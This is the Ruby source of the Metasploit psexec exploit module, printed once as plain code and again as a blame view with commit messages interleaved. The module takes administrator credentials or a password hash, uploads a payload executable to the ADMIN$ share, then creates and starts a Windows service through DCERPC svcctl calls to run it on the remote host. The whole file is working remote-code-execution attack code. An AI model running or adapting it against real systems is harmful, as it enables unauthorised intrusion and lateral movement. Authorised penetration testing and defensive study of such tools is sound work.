metasploit-framework/modules/exploits/windows/smb/psexec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


=begin
Windows XP systems that are not part of a domain default to treating all
network logons as if they were Guest. This prevents SMB relay attacks from
gaining administrative access to these systems. This setting can be found
under:

	Local Security Settings >
	 Local Policies >
	  Security Options >
	   Network Access: Sharing and security model for local accounts	
=end

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Windows Authenticated User Code Execution',
			'Description'    => %q{
				This module uses a valid administrator username and password (or
			password hash) to execute an arbitrary payload. This module	is similar
			to the "psexec" utility provided by SysInternals. Unfortunately, this
			module is not able to clean up after itself. The service and payload
			file listed in the output will need to be manually removed after access
			has been gained. The service created by this tool uses a randomly chosen
			name and description, so the services list can become cluttered after
			repeated exploitation.
			},
			'Author'         => 
				[ 
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'References'     =>
				[
					[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
				],							
			'Payload'        =>
				{
					'Space'        => 8192,
					'DisableNops'  => true,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Automatic', { } ],									
				],
			'DefaultTarget'  => 0 ))
			
			# These should be regular options for this exploit
			register_options(
			[
				OptString.new('SMBUser', [ true, 'The username to authenticate as', "Administrator"]),
				OptString.new('SMBPass', [ false, 'The password for the specified username', ""])
			], self.class)

	end

	def exploit

		print_status("Connecting to the server...")
		connect()
		
		print_status("Authenticating as user '#{datastore['SMBUser']}'...")
		smb_login()
		
		
		if (not simple.client.auth_user)
			print_line(" ")
			print_error(
				"FAILED! The remote host has only provided us with Guest privileges. " +
				"Please make sure that the correct username and password have been provided. " +
				"Windows XP systems that are not part of a domain will only provide Guest privileges " +
				"to network logins by default."
			)
			print_line(" ")
			disconnect
			return
		end

		# Upload the shellcode to a file
		print_status("Uploading payload...")
		filename = rand_text_alpha(8) + ".exe"
		simple.connect("ADMIN$")
		fd = simple.open("\\#{filename}", 'rwct')
		fd << Rex::Text.to_win32pe_service(payload.encoded,rand_text_alpha(8))
		fd.close
		
		print_status("Created \\#{filename}...")
		
		
		# Connect to the IPC service
		simple.connect("IPC$")
		
		
		# Bind to the service
		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		##
		# OpenSCManagerW() 
		##
		
		print_status("Obtaining a service manager handle...")
		scm_handle = nil
		stubdata =
			NDR.uwstring("\\\\#{rhost}") +
			NDR.long(0) +
			NDR.long(0xF003F)
		begin
			response = dcerpc.call(0x0f, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				scm_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
			return
		end
		
		##
		# CreateServiceW()
		##
	
		servicename = rand_text_alpha(8)
		displayname = 'M' + rand_text_alpha(rand(32)+1)
		svc_handle  = nil
		svc_status  = nil
		
		print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
		stubdata =
			scm_handle +
			NDR.wstring(servicename) +
			NDR.uwstring(displayname) +
			
			NDR.long(0x0F01FF) + # Access: MAX
			NDR.long(0x00000110) + # Type: Interactive, Own process
			NDR.long(0x00000003) + # Start: Demand
			NDR.long(0x00000000) + # Errors: Ignore
			
			NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
			NDR.long(0) + # LoadOrderGroup
			NDR.long(0) + # Dependencies
			NDR.long(0) + # Service Start
			NDR.long(0) + # Password
			NDR.long(0) + # Password 
			NDR.long(0) + # Password 
			NDR.long(0)  # Password
		begin
			response = dcerpc.call(0x0c, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
				svc_status = dcerpc.last_response.stub_data[24,4]
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
			return
		end
		
		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception
		end

		##
		# OpenServiceW
		##
		print_status("Opening service...")
		begin
			stubdata =
				scm_handle + 
				NDR.wstring(servicename) +
				NDR.long(0xF01FF)
				
			response = dcerpc.call(0x10, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
			return
		end
		
		##
		# StartService()
		##
		print_status("Starting the service...")
		stubdata =
			svc_handle +
			NDR.long(0) + 
			NDR.long(0) 
		begin
			response = dcerpc.call(0x13, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
			return
		end	

		##
		# DeleteService()
		##
		print_status("Removing the service...")
		stubdata =
			svc_handle 
		begin
			response = dcerpc.call(0x02, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_status("Error: #{e}")
		end		

		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception => e
			print_status("Error: #{e}")
		end
						
		print_status("Deleting \\#{filename}...")
		simple.connect("ADMIN$")
		simple.delete("\\#{filename}")

		handler
		disconnect
	end

end
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`=begin`
			`Windows XP systems that are not part of a domain default to treating all`
			`network logons as if they were Guest. This prevents SMB relay attacks from`
			`gaining administrative access to these systems. This setting can be found`
			`under:`

			`Local Security Settings >`
			`Local Policies >`
			`Security Options >`
			`Network Access: Sharing and security model for local accounts`
			`=end`

			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::DCERPC`
			`include Msf::Exploit::Remote::SMB`
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft Windows Authenticated User Code Execution',`
			`'Description' => %q{`
			`This module uses a valid administrator username and password (or`
			`password hash) to execute an arbitrary payload. This module is similar`
			`to the "psexec" utility provided by SysInternals. Unfortunately, this`
			`module is not able to clean up after itself. The service and payload`
			`file listed in the output will need to be manually removed after access`
			`has been gained. The service created by this tool uses a randomly chosen`
			`name and description, so the services list can become cluttered after`
			`repeated exploitation.`
			`},`
			`'Author' =>`
			`[`
			`'hdm'`
			`],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread'`
			`},`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 8192,`
			`'DisableNops' => true,`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Automatic', { } ],`
			`],`
			`'DefaultTarget' => 0 ))`
Add -f to generate. Add SMBUser/SMBPass options to psexec (regular vs advanced) git-svn-id: file:///home/svn/framework3/trunk@5354 4d416f70-5f16-0410-b530-b9f4589650da 2008-01-25 23:24:06 +00:00
			`# These should be regular options for this exploit`
			`register_options(`
			`[`
Set the defaults for psexec to Administrator/"" git-svn-id: file:///home/svn/framework3/trunk@5361 4d416f70-5f16-0410-b530-b9f4589650da 2008-01-27 02:06:02 +00:00			`OptString.new('SMBUser', [ true, 'The username to authenticate as', "Administrator"]),`
Handling empty strings as a valid required option is tricky, just make the password option non-required git-svn-id: file:///home/svn/framework3/trunk@5363 4d416f70-5f16-0410-b530-b9f4589650da 2008-01-27 02:08:13 +00:00			`OptString.new('SMBPass', [ false, 'The password for the specified username', ""])`
Add -f to generate. Add SMBUser/SMBPass options to psexec (regular vs advanced) git-svn-id: file:///home/svn/framework3/trunk@5354 4d416f70-5f16-0410-b530-b9f4589650da 2008-01-25 23:24:06 +00:00			`], self.class)`

Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`end`

			`def exploit`

			`print_status("Connecting to the server...")`
			`connect()`

			`print_status("Authenticating as user '#{datastore['SMBUser']}'...")`
			`smb_login()`


			`if (not simple.client.auth_user)`
			`print_line(" ")`
			`print_error(`
			`"FAILED! The remote host has only provided us with Guest privileges. " +`
			`"Please make sure that the correct username and password have been provided. " +`
			`"Windows XP systems that are not part of a domain will only provide Guest privileges " +`
			`"to network logins by default."`
			`)`
			`print_line(" ")`
			`disconnect`
			`return`
			`end`

			`# Upload the shellcode to a file`
			`print_status("Uploading payload...")`
			`filename = rand_text_alpha(8) + ".exe"`
			`simple.connect("ADMIN$")`
			`fd = simple.open("\\#{filename}", 'rwct')`
The psexec module now uses a service-compatible exe, shellcode is spawned in a subprocess and the service cleans up properly git-svn-id: file:///home/svn/framework3/trunk@5829 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-03 23:06:37 +00:00			`fd << Rex::Text.to_win32pe_service(payload.encoded,rand_text_alpha(8))`
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`fd.close`

			`print_status("Created \\#{filename}...")`


			`# Connect to the IPC service`
			`simple.connect("IPC$")`


			`# Bind to the service`
			`handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])`
			`print_status("Binding to #{handle} ...")`
			`dcerpc_bind(handle)`
			`print_status("Bound to #{handle} ...")`

			`##`
			`# OpenSCManagerW()`
			`##`

			`print_status("Obtaining a service manager handle...")`
			`scm_handle = nil`
			`stubdata =`
			`NDR.uwstring("\\\\#{rhost}") +`
			`NDR.long(0) +`
			`NDR.long(0xF003F)`
			`begin`
			`response = dcerpc.call(0x0f, stubdata)`
			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`scm_handle = dcerpc.last_response.stub_data[0,20]`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`return`
			`end`

			`##`
			`# CreateServiceW()`
			`##`

			`servicename = rand_text_alpha(8)`
			`displayname = 'M' + rand_text_alpha(rand(32)+1)`
			`svc_handle = nil`
			`svc_status = nil`

			`print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")`
			`stubdata =`
			`scm_handle +`
			`NDR.wstring(servicename) +`
			`NDR.uwstring(displayname) +`

			`NDR.long(0x0F01FF) + # Access: MAX`
			`NDR.long(0x00000110) + # Type: Interactive, Own process`
			`NDR.long(0x00000003) + # Start: Demand`
			`NDR.long(0x00000000) + # Errors: Ignore`

			`NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path`
			`NDR.long(0) + # LoadOrderGroup`
			`NDR.long(0) + # Dependencies`
			`NDR.long(0) + # Service Start`
			`NDR.long(0) + # Password`
			`NDR.long(0) + # Password`
			`NDR.long(0) + # Password`
			`NDR.long(0) # Password`
			`begin`
			`response = dcerpc.call(0x0c, stubdata)`
			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`svc_handle = dcerpc.last_response.stub_data[0,20]`
			`svc_status = dcerpc.last_response.stub_data[24,4]`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`return`
			`end`

			`##`
			`# CloseHandle()`
			`##`
			`print_status("Closing service handle...")`
			`begin`
			`response = dcerpc.call(0x0, svc_handle)`
remove unused exception variables git-svn-id: file:///home/svn/framework3/trunk@5882 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-11 06:00:54 +00:00			`rescue ::Exception`
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`end`

			`##`
			`# OpenServiceW`
			`##`
			`print_status("Opening service...")`
			`begin`
			`stubdata =`
			`scm_handle +`
			`NDR.wstring(servicename) +`
			`NDR.long(0xF01FF)`

			`response = dcerpc.call(0x10, stubdata)`
			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`svc_handle = dcerpc.last_response.stub_data[0,20]`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`return`
			`end`
The psexec and smb_relay module now automatically cleanup. The ms08-06 module now supports all languages of XP SP3. git-svn-id: file:///home/svn/framework3/trunk@5841 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-04 22:27:59 +00:00
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`##`
			`# StartService()`
			`##`
			`print_status("Starting the service...")`
			`stubdata =`
			`svc_handle +`
			`NDR.long(0) +`
			`NDR.long(0)`
			`begin`
			`response = dcerpc.call(0x13, stubdata)`
			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`return`
			`end`

			`##`
			`# DeleteService()`
			`##`
			`print_status("Removing the service...")`
			`stubdata =`
			`svc_handle`
			`begin`
			`response = dcerpc.call(0x02, stubdata)`
			`if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)`
			`end`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`end`

			`##`
			`# CloseHandle()`
			`##`
			`print_status("Closing service handle...")`
			`begin`
			`response = dcerpc.call(0x0, svc_handle)`
			`rescue ::Exception => e`
			`print_status("Error: #{e}")`
			`end`

			`print_status("Deleting \\#{filename}...")`
			`simple.connect("ADMIN$")`
			`simple.delete("\\#{filename}")`
The psexec module now uses a service-compatible exe, shellcode is spawned in a subprocess and the service cleans up properly git-svn-id: file:///home/svn/framework3/trunk@5829 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-03 23:06:37 +00:00
Lots of SMB fun, all preparation for Black Hat talk :-) More to come... git-svn-id: file:///home/svn/framework3/trunk@5015 4d416f70-5f16-0410-b530-b9f4589650da 2007-07-03 04:20:50 +00:00			`handler`
			`disconnect`
			`end`

The psexec module now uses a service-compatible exe, shellcode is spawned in a subprocess and the service cleans up properly git-svn-id: file:///home/svn/framework3/trunk@5829 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-03 23:06:37 +00:00			`end`